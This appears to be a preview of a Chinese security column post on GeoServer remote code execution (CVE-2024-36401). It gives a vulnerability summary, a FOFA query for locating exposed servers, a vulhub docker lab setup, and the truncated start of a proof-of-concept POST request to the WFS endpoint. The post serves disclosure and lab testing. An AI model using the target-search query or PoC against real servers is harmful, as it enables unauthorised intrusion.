专栏名称: 阿乐你好
安全相关信息推送
今天看啥  ›  专栏  ›  阿乐你好

GeoServer 远程代码执行漏洞(CVE-2024-36401)

阿乐你好  · 公众号  ·  · 2024-07-04 09:08

文章预览

漏洞简介 GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作。 在GeoServer 2.25.1, 2.24.3, 2.23.5版本及以前,未登录的任意用户可以通过构造恶意OGC请求,在默认安装的服务器中执行XPath表达式,进而利用执行Apache Commons Jxpath提供的功能执行任意代码。 网络测绘 FOFA:app="GeoServer" 环境搭建 #docker-compose.yml文件 version : '3' services : web : image : vulhub/geoserver:2.23.2 ports : - "8080:8080" - "5005:5005" docker compose up -d 漏洞Poc ‍ ‍ POST /geoserver/wfs HTTP/1.1 Host : Accept-Encoding : gzip, deflate, br Accept : */* Accept-Language : en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36 Content-Type: application/xml xmlns:topp='http://ww ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览